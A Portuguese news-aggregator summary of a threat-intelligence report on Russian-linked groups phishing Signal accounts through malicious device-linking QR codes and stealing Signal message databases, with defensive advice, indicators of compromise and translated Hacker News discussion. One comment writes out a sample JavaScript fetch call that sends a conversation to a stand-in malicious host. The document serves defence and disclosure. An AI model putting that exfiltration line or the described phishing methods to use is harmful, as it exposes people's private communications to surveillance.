1 pontos por GN⁺ 2025-02-20 | 2 comentários | Compartilhar no WhatsApp
  • Contas do Signal usadas por pessoas de interesse dos serviços de inteligência russos estão se tornando alvo prioritário, com aumento nas tentativas de comprometimento para atingir comunicações sensíveis de governo e militares
  • A técnica mais usada tem sido abusar do recurso legítimo Linked Devices, levando a vítima a escanear um QR code malicioso e, depois disso, sincronizando as mensagens em tempo real com o dispositivo do atacante
  • O UNC5792 usa convites falsos para grupos do Signal, o UNC4221 usa kits de phishing com tema do Kropyva e alertas de segurança falsos, e o APT44 busca o vínculo de dispositivos por meio de acesso a aparelhos capturados
  • APT44, Turla e o UNC1151 ligado a Belarus também operam recursos para roubar o banco de dados do Signal ou mensagens e anexos do Signal Desktop em ambientes Android e Windows
  • O problema não se limita ao Signal: WhatsApp e Telegram também vêm sendo alvos semelhantes, por isso é necessário manter os apps atualizados, verificar dispositivos vinculados, ter cautela com QR codes e usar bloqueio de tela forte

Atividades ligadas à Rússia mirando contas do Signal

  • O Google Threat Intelligence Group (GTIG) confirmou que vários agentes de ameaça ligados ao Estado russo estão aumentando as tentativas de comprometer contas do Signal Messenger
  • Os principais alvos são pessoas de interesse dos serviços de inteligência russos, e a demanda de guerra por acesso a comunicações sensíveis de governo e militares impulsionou essa atividade desde a reinvasão da Ucrânia
  • O Signal é um mensageiro seguro usado por militares, políticos, jornalistas, ativistas e comunidades de alto risco, o que o torna um alvo de alto valor para vigilância e espionagem
  • A ameaça também se expande para outros mensageiros populares, como WhatsApp e Telegram, com grupos ligados à Rússia aplicando técnicas semelhantes
  • As versões mais recentes do Android e do iOS do Signal incluem reforços que ajudam a se defender de campanhas de phishing desse tipo
    • Os usuários precisam atualizar para a versão mais recente para usar esses recursos

Como o recurso Linked Devices está sendo explorado

  • A técnica mais nova e mais difundida é o abuso do recurso legítimo linked devices do Signal
  • Para usar o app em vários dispositivos ao mesmo tempo, o Signal normalmente exige o escaneamento de um QR code ao vincular um dispositivo adicional
  • Os agentes de ameaça criam um QR code malicioso que, quando escaneado pela vítima, conecta uma instância do Signal controlada pelo atacante à conta da vítima
  • Se a vinculação for bem-sucedida, as mensagens passam a ser sincronizadas em tempo real para a vítima e para o atacante, permitindo continuar espionando conversas seguras sem comprometer totalmente o dispositivo
  • Em phishing remoto, o QR code malicioso costuma ser disfarçado como:
    • convite para grupo do Signal
    • alerta de segurança
    • instrução legítima de pareamento de dispositivo do site do Signal
  • Em campanhas de phishing mais personalizadas, o QR code malicioso de vínculo de dispositivo é embutido em páginas que parecem aplicativos especializados usados pelas Forças Armadas da Ucrânia
  • O mesmo método também é usado em operações de acesso físico próximo
    • O APT44 permite que forças russas destacadas no campo de batalha conectem contas do Signal de dispositivos capturados à infraestrutura controlada pelo atacante para exploração posterior
  • O comprometimento de conta por meio de dispositivos recém-vinculados tende a ser um acesso inicial de baixo sinal, já que faltam mecanismos centralizados de detecção e defesa
    • Se der certo, há grande risco de a intrusão passar despercebida por longos períodos

UNC5792: convites de grupo do Signal adulterados

  • O UNC5792 é um cluster suspeito de atividade de espionagem russa e tem alguma sobreposição com o UAC-0195 do CERT-UA
  • Esse grupo adulterou a página legítima de group invite do Signal para uso em campanhas de phishing
  • No fluxo normal, o usuário é redirecionado para um grupo do Signal, mas a página adulterada envia a vítima para uma URL maliciosa que vincula um dispositivo controlado pelo atacante à conta do Signal da vítima
  • A infraestrutura controlada pelo atacante é montada para parecer um convite legítimo para grupo do Signal
  • O JavaScript do falso convite de grupo substitui o redirecionamento comum para entrada em grupo do Signal por um bloco malicioso contendo um URI de vínculo de novo dispositivo do Signal no formato sgnl://linkdevice?uuid=
  • Um domínio de exemplo identificado foi signal-groups[.]tech

UNC4221: kit de phishing personalizado para o Signal

  • O UNC4221 é um agente de ameaça ligado à Rússia, rastreado pelo CERT-UA como UAC-0185, e tem mirado ativamente contas do Signal usadas por militares ucranianos
  • O grupo opera um kit de phishing personalizado para o Signal que se passa por componentes do aplicativo Kropyva usado pelo Exército ucraniano para coordenação de artilharia
  • Assim como o UNC5792, o UNC4221 oculta o recurso de vínculo de dispositivos em algo que parece um convite para grupo do Signal enviado por um contato confiável
  • As variações observadas do kit de phishing incluem:
    • sites de phishing que redirecionam a vítima para uma infraestrutura secundária que parece a instrução legítima de vínculo de dispositivo fornecida pelo Signal
    • sites que inserem diretamente um QR code malicioso de vínculo de dispositivo no kit de phishing com tema padrão do Kropyva
    • páginas de phishing das operações iniciais de 2022, feitas para parecer alertas legítimos de segurança do Signal
  • Exemplos de domínios e páginas incluem signal-confirm[.]site, teneta.add-group[.]site e signal-protect[.]host
  • O UNC4221 também usa um payload leve em JavaScript chamado PINPOINT como componente central de suas campanhas contra o Signal
    • O PINPOINT coleta informações básicas do usuário e dados de localização por meio da API GeoLocation do navegador
  • Em operações semelhantes no futuro, mensagens seguras e dados de localização podem ser alvo conjunto
    • Isso vale especialmente em contextos de vigilância direcionada ou apoio a operações militares convencionais

Atividades ligadas à Rússia e Belarus para roubo de mensagens do Signal

  • Além de vincular dispositivos extras à conta da vítima, vários agentes de ameaça conhecidos da região também operam recursos para roubar arquivos de banco de dados do Signal em dispositivos Android e Windows
  • O APT44 usa um script leve em Batch para Windows chamado WAVESIGN
    • Ele consulta periodicamente mensagens do Signal no banco de dados da vítima
    • E exfiltra mensagens recentes com Rclone
  • O malware Android Infamous Chisel, atribuído ao Sandworm e reportado em 2023 pelo Security Service of Ukraine (SSU) e pelo National Cyber Security Centre (NCSC) do Reino Unido,
    • foi projetado para buscar recursivamente extensões de arquivo, incluindo bancos de dados locais de vários apps de mensagens, entre eles o Signal, em dispositivos Android
  • A Turla é um agente de ameaça russo atribuído ao FSB Center 16
    • Após uma invasão, o grupo opera scripts leves em PowerShell para preparar a extração de mensagens do Signal Desktop em ambientes Windows
  • O UNC1151, ligado a Belarus, usa o utilitário de linha de comando Robocopy
    • para preparar o conteúdo do diretório de arquivos onde o Signal Desktop armazena mensagens e anexos para posterior exfiltração

Medidas de defesa para usuários de mensageiros seguros

  • O foco intenso de vários agentes no Signal mostra que as ameaças contra aplicativos de mensagens seguras podem se intensificar no curto prazo
  • Com o crescimento da indústria de spyware comercial e o aumento de variantes de malware móvel usadas em zonas de conflito, cresce a demanda por capacidades cibernéticas ofensivas voltadas à vigilância de comunicações sensíveis
  • A ameaça não se limita a operações cibernéticas remotas, como phishing e entrega de malware
    • Operações de acesso físico próximo, em que o atacante consegue acesso temporário a um dispositivo desbloqueado do alvo, também são um risco importante
  • Além do Signal, WhatsApp e Telegram também estão entre as prioridades recentes de grupos ligados à Rússia
    • A Microsoft Threat Intelligence abordou, em um post recente no blog, uma campanha em que COLDRIVER, UNC4057 e Star Blizzard tentaram abusar do recurso Linked Devices para comprometer contas do WhatsApp
  • Usuários que possam se tornar alvo de intrusões apoiadas por governos devem adotar os seguintes hábitos de defesa
    • ativar o bloqueio de tela em todos os dispositivos móveis e usar senhas longas e complexas com letras maiúsculas, minúsculas, números e símbolos
    • no Android, preferir senha alfanumérica, que oferece segurança muito maior do que PIN numérico ou padrão de desenho
    • instalar atualizações do sistema operacional o quanto antes e manter o Signal e outros apps de mensagens sempre nas versões mais recentes
    • manter ativado o Google Play Protect, habilitado por padrão em dispositivos Android com Google Play Services
    • verificar regularmente a seção “Linked devices” nas configurações do app para ver se há dispositivos não autorizados
    • ter cautela com QR codes e recursos web que pareçam atualizações de software, convites de grupo ou outros alertas e que pressionem por ação imediata
    • sempre que possível, usar autenticação em duas etapas, como impressão digital, reconhecimento facial, chave de segurança ou código de uso único, para validar login na conta ou vínculo de novo dispositivo
    • usuários de iPhone preocupados com vigilância direcionada ou espionagem devem considerar ativar o Lockdown Mode para reduzir a superfície de ataque

Resumo de indicadores de comprometimento e técnicas observadas

  • Para apoiar atividades de hunting e identificação nas organizações, os indicadores de comprometimento estão incluídos na GTI Collection para usuários registrados
  • Exemplos de indicadores de comprometimento relacionados incluem:
    • UNC5792: e078778b62796bab2d7ab2b04d6b01bf, exemplo de código HTML de convite de grupo adulterado
    • Páginas de phishing de falso convite de grupo do UNC5792: add-signal-group[.]com, add-signal-groups[.]com, group-signal[.]com, groups-signal[.]site, signal-device-off[.]online, signal-group-add[.]com, signal-group[.]site, signal-group[.]tech, signal-groups-add[.]com, signal-groups[.]site, signal-groups[.]tech, signal-security[.]online, signal-security[.]site, signalgroup[.]site, signals-group[.]com
    • Páginas de phishing com instrução de vínculo de dispositivo do UNC4221: signal-confirm[.]site, confirm-signal[.]site
    • Falso alerta de segurança do Signal do UNC4221: signal-protect[.]host
    • Falso convite de grupo do Kropyva do UNC4221: teneta.join-group[.]online, teneta.add-group[.]site, group-teneta[.]online, helperanalytics[.]ru, teneta[.]group, group.kropyva[.]site
    • APT44: 150.107.31[.]194:18000, QR code de vínculo de dispositivo gerado dinamicamente e fornecido pelo APT44
    • Script Batch WAVESIGN do APT44: a97a28276e4f88134561d938f60db495, b379d8f583112cad3cf60f95ab3a67fd, b27ff24870d93d651ee1d8e06276fa98
  • As táticas e técnicas observadas por agente de ameaça incluem:
    • UNC5792: phishing remoto com falsos convites de grupo para parear mensagens do Signal da vítima a um dispositivo controlado pelo atacante
    • UNC4221: phishing remoto com falsos aplicativos web militares e alertas de segurança para parear mensagens do Signal da vítima a um dispositivo controlado pelo atacante
    • APT44: exploração de dispositivos fisicamente acessíveis para parear mensagens do Signal da vítima a um dispositivo controlado pelo atacante
    • APT44: tentativa de exfiltração de arquivos de banco de dados do Signal com o malware Android Infamous Chisel
    • APT44: exfiltração periódica de mensagens recentes do Signal por meio de script Batch no Windows com Rclone
    • Turla: roubo de banco de dados do Signal Desktop após comprometimento de ambiente Windows
    • UNC1151: preparação para exfiltração do diretório de arquivos do Signal Desktop com Robocopy

2 comentários

 
ndrgrd 2025-02-20

É verdade que ele é vulnerável, mas é engraçado ver o Telegram — que nem sequer criptografa corretamente os chats em grupo — criticando algo do ponto de vista de segurança.

 
GN⁺ 2025-02-20
Opiniões do Hacker News
  • Apps com um workflow de dispositivos vinculados, como o Signal, já eram arriscados havia bastante tempo
    Quando o Telegram criticou o Signal no ano passado, também apontou esse ponto (https://news.ycombinator.com/context?id=40303736), e vejo a implementação de dispositivos vinculados do Signal como problemática há muito tempo: https://eprint.iacr.org/2021/626.pdf
    O surpreendente, na verdade, é que tenha demorado tanto para casos reais de ataque aparecerem na literatura pública. Também não ajudou o Signal ter considerado esse ataque fora do seu modelo de ameaças. Segundo o artigo, o Signal recebeu o relatório em 20 de outubro de 2020 e respondeu em 28 de outubro dizendo que não incluía o comprometimento de chaves secretas de longo prazo em seu modelo de adversário

    • Se entendi corretamente, esse ataque pressupõe que o invasor já tenha a chave privada (IK), armazenada apenas no dispositivo do usuário, e a senha do usuário
      Nesse caso, seria necessário ter acesso físico a um dos dispositivos da vítima ou algum outro backdoor; a essa altura, já não estaria tudo perdido? Corrijam-me se eu estiver errado. Segurança física de hardware e prevenção contra phishing ainda parecem ser o essencial
    • O ataque desse artigo pressupõe que a chave privada de identidade de longo prazo (IK) do usuário, usada para derivar outras chaves do protocolo Signal, já foi roubada
      Fora do laboratório, as formas de obtê-la geralmente se resumem a conseguir acesso root ao dispositivo do usuário ou roubar um backup recente das conversas. A campanha descoberta pelo Google se parece mais com phishing e é tecnicamente menos grave, mas como alertar o usuário de que ele está prestes a fazer algo perigoso é um problema difícil que envolve toda a área de segurança de usabilidade. Isso se tornará mais importante no Signal quando, ao adicionar um novo dispositivo vinculado, o histórico de mensagens e os anexos dos últimos 45 dias começarem a ser copiados também
    • Fico me perguntando se não usar a função de dispositivos vinculados também reduz essa superfície de ataque
  • O que sinto cada vez mais hoje em dia é que a criptografia de ponta a ponta, no fim, exige que o cliente possa ser compilado e verificado diretamente pelo usuário final
    Estou criando um serviço de chat de IA criptografado, baseado em CRDTs criptografados, e basta colocar uma linha de fetch ou um rastreador de analytics na parte de renderização para que a segurança prometida pelo protocolo vire inútil. Indo além, é preciso confiar até no sistema operacional em que a renderização é executada
    Mesmo que o cliente seja open source e possa ser compilado de forma reproduzível, ele ainda precisa ser distribuído pela iOS Store, e qualquer coisa pode acontecer no processo de publicação. Usei o iOS como exemplo porque é especialmente difícil instalar apps compilados por conta própria. Em um chat entre várias pessoas, a outra parte também precisa passar pelo mesmo processo
    Mesmo usando todo tipo de protocolo sofisticado e a melhor criptografia em trânsito, no fim tudo é uma questão de confiança. Ao usar algo como o Signal, me preocupa se as pessoas não acabam virando alvos de vigilância justamente sob a ilusão de estarem em um ambiente totalmente seguro. Se um órgão governamental quiser vigiar, imagino que vá concentrar recursos nos usuários do Signal, que provavelmente têm mais a esconder
    Às vezes parece que tudo é inútil, exceto armazenamento criptografado. Também acho estranho que a maior parte da discussão fique na validade de protocolos de segurança centrados em matemática. Uma única linha na camada de renderização, como fetch("[https://malvevolentactor.com](<https://malvevolentactor.com>;)", {body: JSON.stringify(convo)}), pode contornar tudo; tenho curiosidade sobre o que pensam disso

    • No fim, se você não controla todo o pipeline, da areia que vira silício da CPU ao sistema operacional e à forma como os pacotes são entregues, precisa colocar uma raiz de confiança em algum lugar
      Eliminar a confiança parece impossível; apenas deslocamos o que confiamos ou a escondemos atrás de uma abstração. O que ficará mais importante daqui para a frente são mecanismos que deixem claro quando uma entidade em que se confiou até certo ponto age de forma maliciosa, provando isso e responsabilizando-a
      Exemplos incluem logs de transparência de certificados para impedir ataques man-in-the-middle, builds reproduzíveis para verificar se o binário recebido corresponde ao código open source público, e transparência de chaves para confirmar, no WhatsApp/Signal/iMessage, que você recebeu a chave pública esperada, não uma chave da NSA
    • Tenho a impressão de que a carroça está na frente dos bois: há uma obsessão crescente com o status teórico dos métodos de criptografia, enquanto os riscos práticos de vários resultados ficam em segundo plano
      Um sistema que tenta ser seguro demais pode acabar impedindo o usuário de ler as próprias mensagens e, no fim, empurrá-lo para um sistema menos seguro. No Matrix, também houve problemas porque os clientes não conseguiam deixar claro que, ao fazer logout, você poderia perder mensagens permanentemente
      Alguns requisitos fortes, como sigilo futuro perfeito, podem entrar em conflito, na prática, com o que usuários querem de mensageria. O que o usuário quer é: “eu posso ver minhas mensagens quando quiser, e mais ninguém jamais pode vê-las”, mas isso é muito difícil. Há uma tensão fundamental entre segurança, redefinição de senha e recuperação após perda do celular
      Se as pessoas entendessem completamente as consequências possíveis, muitas talvez não quisessem a criptografia de ponta a ponta mais forte. Poderiam preferir garantias jurídicas fortes, como “se alguém ler minhas mensagens, vai para a prisão pelo resto da vida”. Há quem queira o nível máximo de segurança técnica, mas projetar tudo em torno dessa prioridade pode gerar reação negativa entre usuários que não aceitam esses trade-offs
    • Acho bastante sem sentido construir, sobre iOS e Google Play Services, algo que precisa ser seguro a ponto de se preocupar com a diferença entre criptografia de ponta a ponta e criptografia cliente-servidor
      Quem se importa com esse nível de segurança provavelmente tentaria usar outra coisa que não um iPhone. Quando defensores do Signal chamam usuários de criptossistemas de que não gostam de LARPers, isso parece uma projeção típica. Exceto talvez para quem trabalha no governo dos EUA, não sei bem qual é o modelo de ameaça real para o qual o Signal é adequado
      Também existe claramente um efeito poste de luz entre pesquisadores acadêmicos de criptografia, que se concentram em algoritmos matemáticos. Hoje, o escopo do que pode receber financiamento em pesquisa de segurança ficou um pouco mais amplo e chega a incluir modelos de brinquedo de protocolos de mensageria de ponta a ponta, mas ainda é insuficiente para cobrir todo o percurso humano a humano, que é o que realmente importa
    • Parte do que você está falando também é chamada de atestação (attestation)
      Basicamente, uma raiz confiável assina algo para permitir verificar, sem dúvida, de qual telefone + sistema operacional + app veio a entidade com que você está interagindo
      O Android tem isso e, por exemplo, pode confirmar a terceiros se há um bootloader bloqueado, uma assinatura do Google e um sistema operacional do Google em execução. Em tese, também seria possível ter outra cadeia de confiança e fazer com que a contraparte remota aceite software “original” como um telefone Google + Lineage OS
      Apps também podem verificar assinaturas de apps acessíveis ao sistema operacional e, se necessário, fornecê-las à contraparte remota. Um artefato de atestação totalmente transparente, que não dependa cegamente de uma única entidade como o Google, poderia usar um registro contendo hashes e binários dos componentes verificados, em vez de uma raiz de confiança por assinatura
      Tudo isso é tecnicamente possível, mas hoje não foi implementado de uma forma realmente viável. Se houver interesse suficiente, acho que acabará sendo implementado
    • Os problemas que você levantou certamente existem, mas parece que estamos esquecendo como era o estado das comunicações 10 a 15 anos atrás
      Naquela época nada era criptografado, fazer qualquer coisa em Wi-Fi público era praticamente roleta-russa, e as agências de inteligência de sinais viviam uma era de ouro. Naquele momento, a criptografia de rede tinha prioridade maior
  • O artigo não diz isso claramente, mas, pelo que entendi, a primeira etapa de um dos ataques é pegar o smartphone de um soldado morto em combate

    • O artigo diz que eles criam um QR code malicioso para fazer a vítima conectar o dispositivo do atacante ao Signal
      Se der certo, as mensagens seguintes passam a ser entregues em tempo real tanto à vítima quanto ao atacante
    • Falando sério, isso levanta o problema de smartphones se tornarem equipamento padrão para soldados
      Mas smartphones dão a todos os soldados uma plataforma poderosa de computação e comunicação que pode ser usada sem treinamento específico. A questão é como torná-la segura, inclusive contra os riscos mencionados no comentário acima
      Imagino que alguém esteja pesquisando como protegê-los o suficiente para que até os serviços de inteligência russos não consigam explorá-los com eficácia. Se uma solução assim se disseminar, ela também poderá ser bem aplicada à privacidade de civis. Proteger celulares de civis ucranianos contra atacantes russos também não é uma má ideia
    • Soldados não têm permissão para portar celular
  • Se for o caso de dizer que basta escanear um QR code uma vez para vincular um dispositivo, acho que isso é uma brecha
    Não deveria ser possível conectar um dispositivo só escaneando o código; deveria haver uma confirmação manual do tipo “Sim, quero conectar a este dispositivo”. Assim, mesmo que a pessoa escaneie achando que é um código de convite para um grupo, pode perceber que na verdade não é. Claro, ainda depende de o usuário perceber, mas é uma melhoria significativa em relação a “achei que era um código para entrar em um grupo, escaneei e, silenciosamente, outro dispositivo foi conectado”

    • É preciso lembrar que o Signal foi projetado para usuários não técnicos
      Muitos usuários não entendem coisas como QR codes, links e conexões, nem pensam muito a respeito. Eles fazem suposições imediatas e instintivas e clicam, muitas vezes para tirar algo da tela e voltar ao que estavam fazendo. Não sei se há base para dizer que não existe um processo de confirmação; provavelmente dá para saber olhando a documentação do Signal
  • Artigo relacionado: https://www.wired.com/story/russia-signal-qr-code-phishing-a... (https://web.archive.org/web/20250219110740/https://www.wired..., https://archive.ph/MbR9e)
    Vi via https://news.ycombinator.com/item?id=43103692, mas não há comentários lá

  • A boa notícia é que há um motivo para ele ser alvo. Isso significa que o Signal ainda é eficaz

  • Há muitas vozes tentando dizer que o Signal foi comprometido, mas em quase todos os casos é preciso notar que esse pessoal tem menos abertura de código que o Signal
    O Signal está fazendo o melhor que pode para proteger direitos humanos mesmo tendo se tornado uma empresa em escala web. A dignidade individual importa. Não é uma conversa trivial

    • Fico confuso sobre “quem” o teria comprometido. A Rússia? Agências de inteligência dos EUA?
      Dei uma olhada rápida nos membros do conselho no site da Signal Foundation e vi expressões como Council on Foreign Relations, World Economic Forum Young Global Leader, Truman National Security Project security fellow e Foreign Affairs Policy Board do U.S. Department of State
      Essas pessoas soam como parte do mundo das agências de inteligência. Fico curioso sobre o que exatamente fazem no conselho do Signal, um app de mensagens open source. Concordo que não é uma conversa trivial
    • O Telegram é especialmente pior. Usa criptografia própria e protocolo próprio, por padrão não oferece criptografia de ponta a ponta nenhuma e armazena tudo em texto claro nos servidores
    • No geral, é um ambiente difícil, com muita desinformação, e isso vale ainda mais para um alvo valioso como o Signal
      Se o Signal é seguro, quem ataca a privacidade vai querer que as pessoas acreditem que ele foi comprometido e usem outra coisa. Se não é seguro, vai querer o contrário: que as pessoas acreditem que o Signal é seguro
      Acho que a solução é ignorar completamente possíveis fontes de desinformação, especialmente usuários aleatórios em redes sociais. Isso inclui o HN. É difícil quando o centro social está nesses lugares, e é preciso se excluir deles. É necessário se limitar a vozes legítimas e confiáveis
    • Não sabia que ainda havia gente usando “escala web” a sério
      “MongoDB é escala web. Basta ligar e ele escala automaticamente”
  • No menu de configurações, é possível verificar se há dispositivos vinculados inesperados

    • Fico pensando se seria bom o Signal sempre mostrar os dispositivos vinculados diretamente na interface do usuário
      Poderia ser algo como um pequeno ícone dizendo “3 dispositivos conectados ativos”
    • Boa ideia. Vou te enviar um QR code
  • Foram informados alguns domínios, mas nem todos estão registrados
    Por exemplo, signal-protect[.]host e kropyva[.]site estão disponíveis, e signal-confirm[.]site está registrado na Ucrânia. Alguns estão registrados na Rússia
    Não se deve confiar em nenhum dos lados quando se trata de países em guerra. A culpa A em B e B culpa A, mas ambos têm suas próprias agendas

    • Mesmo que signal-confirm[.]site esteja registrado na Ucrânia, dados de WHOIS costumam ser falsos, então é difícil usar isso como base
      Sabe-se que a Rússia também usa credenciais ou cartões SIM roubados de países vizinhos, incluindo a Ucrânia, para esse tipo de coisa
    • É um erro presumir automaticamente que, só porque o domínio de um agente malicioso foi registrado na Ucrânia, ele atua em favor dos interesses ucranianos ou que as autoridades ucranianas têm conhecimento disso
      Infelizmente, agentes estatais russos também não têm problemas para operar dentro da Ucrânia. Some a isso criminosos caóticos que seguem quem paga mais, além de pessoas que cruzam diariamente entre áreas temporariamente ocupadas pela Rússia e a Ucrânia, e a situação rapidamente fica complicada
    • Domínios não registrados também podem ser indicadores de comprometimento se tiverem sido encontrados, por exemplo, em uma análise de payload